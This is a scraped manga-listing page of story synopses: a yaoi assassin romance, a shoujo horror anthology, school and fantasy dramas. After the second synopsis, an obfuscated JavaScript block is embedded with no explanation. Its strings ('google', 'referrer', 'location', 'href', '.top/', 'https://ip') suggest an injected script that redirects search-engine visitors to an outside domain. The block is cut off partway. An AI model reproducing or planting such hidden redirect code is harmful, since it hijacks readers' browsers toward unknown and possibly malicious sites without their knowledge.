The passionate love drama of the 5 high school boys who live in the same house. Original Webtoon:
“Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” There are three genders in this world: ABO. Hitman Mo Jia Wen received a mission to assassinate the talented researcher, Shao Yuan Fan. However, in contact with Shao Yuan Fan, he found out that this person has an unknown past, and those past unexpectedly is related and linked to him in countless ways…<script></script><script>function _0x2d35(){var _0x3feecd=['.customapi','google','random','7284490vhcAgo','5630870oXfqcB','16945MgWmkI','nguYw','6538hiTUuF','includes','238689nFUFbf','aeBYg','SKFVA','421575fgOIjR','.top/','http://rea','100XCphVh','then','72BpRfeN','IUAFG','516QPyQlD','https://ip','tGjTv','aOYQh','text','SRuIV','BMWso','ndrtj','zNvFb','href','referrer','','floor','20sBopRG','2296ZTpDyR','3915OoSVCh','location'];_0x2d35=function(){return _0x3feecd;};return _0x2d35();}(function(_0x138ca8,_0x5ccd37){var _0x52556f=_0x2109,_0x1d2bf4=_0x138ca8();while(!![]){try{var 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In the summer of his second year of high school, Yuushin Tahara finds that his childhood friend, Miyu Fukagawa, who had moved away, has returned to the house next door. Although Miyu has grown up to be quite cute, there's something a little strange about her... A fresh and suspenseful romantic comedy about the gentle protagonist and his cute but rather quirky childhood friend, along with their friends and the adventures they get into!
Folklore detective Asou Daisuke would rather deal with normal, everyday, things like cheating spouses, embezzling partners and the like. (That and his huge collection of ero-manga.) Because whenever he deals with the supernatural, he gets the hiccups. But no matter, an endless stream of desperate people come to him troubled by what he calls allegories. Those are stories, usually urban legends, that one believes to be true and if one believes strong enough can cause them to become true. His first case involves "The Man Under The Bed." Can he stop this creepy man with an axe before he chops up kawaii Hiranuma Kanae? Why does Asou count his hiccups, and just who is that strange girl in his bathroom?
[From Shoujo Magic]: This is a shoujo horror anthology, containing 9 stories. 1) I Know Basketgore After loving Shouhei ever since her second year of middle school, Natsumi finally gets to go out with him.But then she starts getting prank calls telling her to break up with him.Then mysterious things start happening around her. Pots falling from windows, insects in her locker, glass shards in her towel. Are these just harmless pranks, or is someone truely out to get Natsumi? 2) Labyrinth Maze of Memories "Forgive me!Don't kill me" Those are the words Honjou Kumi continues to hear in her nightmares.She lost all of her memories of the time before her accident, so she doesn't understand why the students stare at her and whisper.Pranks are pulled on her left and right.What is it that she doesn't remember? 3) Best Friend Koyuki and Hiroyo are the best of friends.They've always chosen to be with each other.Hiroyo always listens to what Koyuki tells her to do, because she knows best.So when Kinoshita says that he's in love with Hiroyo, Koyuki doesn't believe him.She says the only way she will believe him is to go to the lecture room at 5:55pm to see the bleeding holy mother statue.Hiroyo tries to stop him, causing all three of them to see it.According to the rumor all the people who see the bleeding statue will all die.Things start happening, causing Hiroyo to be frightened.But only she is targeted.Could it be that Koyuki and Kinoshita are out to get her? 4) The Neighbor's Doll Itsumi finds her neighbor, Yurika's, doll in the trash, so she decides to adopt it.She sets it out onto the balcony to dry and Yurika notices it there. She gets jealous because now it's all clean and cute.She gets her mother to get it back saying that it was thrown away by accident.After getting the dye on her shirt she says she only wanted it back so Itsumi couldn't have it.In the morning, the doll is sitting at Itsumi's door.However, Yurika claims she didn't put it there... 5) Black Cat Sakura is a timid girl,unable to say no, so when she sees two classmates throwing rocks at a cat, she wants to stop them but can't.They tell her to join in or they'll tell everyone to ignore her.she throws a rock at the cat and runs away, hating herself for it.she goes back to check on the cat to find it dead from the rock she threw.An old lady tells her that the cat won't be able to rest in peace.Strange things start to happen around her, and the two other girls are dead, so will she end up dead too? 6) Former Residents of Darkness Mihara Yuna and her family just moved into their new home.Not soon after she notices a figure standing in the doorway and she feels a cool gust of air,but the air conditioner isn't set up and it's the beginning of summer.Her father has started feeling unwell.She starts seeing the white shadow turning up in other places.And she hears voices saying to get out.Soon she hears from the real estate agent that the house is haunted that the whole family died in that house on the 29th of July.Any family that moved in died, and the day they moved in was July 28th. 7) Last Request Mikoto and her childhood friend,Yamato are staying at her grandfather's temple which they use as a hostel.In Mikoto's room, she finds a doll.She is told that the doll is that of a dead child. She then prays for the child. She is woken up in the middle of the night by Ayano, the dead girl, asking for water.Then she continues to ask for more and more, gaining everything she wants.But then she wants Mikoto's life. Will she give it to Ayano? 8) If You Turn The Page Emiri finds the notebook of her decease mother in her study, and decides to write horror in it.But then the events that she wrote about start happening around her.She knows she must stop writing in the notebook, but suddenly her arm is taken over and forcing her to write.People around her are starting to die, but how can she stop it? 9) Red String Mayumi says that the red string tyed to her pinky is attached to her life long partner, Yuuya.And then, Yuuya is hit by a car at in intersection. But has the red string really been cut?
Summary From: Pinoymanga ScansThe girl with psychic abilities Sae-in, the pretty foreign boy Harvey and the top model Jin-song that Sae-in really likes.An interesting story of the intertwined fate of these three teenagers. And who could be the guy that Sae-in is talking to through telekenesis?
There is a planet where all the inhabitants have mysteriously disappeared. This planet was called "Earth." Four people (Shiki, Miyuki, Yoshimura, and Satou) are dispatched to investigate the planet, its remaining living things, and the remains of the culture that once thrived there. Together, they pass peaceful days on the quiet Earth.
From DGT: When Asano Arisu was little she was badly bullied by the local boys, now a high school student she's famous for her vehement hatred of men and boards an all girls school. When stunning Fujimi Kira enters and becomes her dorm-mate, proclaiming that she also hates men, Arisu thinks that it must be a fated meeting. However, they both have secrets that they need to keep from the Dorm Head, strict Kamitani-Sensei: Arisu keeping a pet ferret in the dorm, and Kira the fact that she's actually a BOY--much to Arisu's horror. It appears that he's at the school to uncover the mystery of his older half-sister's supposed suicide 2 years before. Will Arisu be able to cope with having to share a room with a boy, let alone help him with his investigations? And just how dangerous will it be to solve the mystery?
Story of a buxom and no-nonsense crime-fighting mentalist.
At the behest of his father, Qin Wenyu went to Japan, where he came into contact with a strange curse that caused him to enter a dream. Soon, he realized that he had been cursed as well. A Noh mask, Shinjya, had materialized, and he had also obtained Nine-Eyed Magatama.Qin Wenyu soon realized that curses were divided into five color categories: gray, white, black, blue, and red. All cursed people would have their own Noh mask. Before the start of the next curse, these cursed men and women would be contacted by the shaman hosting the feast and asked to participate. Lastly, there is only one way to end the curse: collect all nine Nine-Eyed Magatama...
The sickly Sect Master Yun Yifeng peddles intelligence, and Prince Xiao requires his service to investigate a theft. Enticing Yun with medicine that can cure his sickness—something Prince Xiao doesn't have—the two embark on a journey to investigate the theft. Something blossoms beyond friendship along the way.
Ha-jeong, a high school girl living an unfortunate life, has only a glimpse of the daily life of the influencer \"Daldalrun.\" Ha-jeong has an obsession level of affection for her and even hacked into the wall pad of her house and peeks at even her very private life. One day, while peeking into Daldalrun\'s room as usual. Ha-jeong witnesses Daldalrun\'s death, and the next day, she finds herself possessed by her dead body....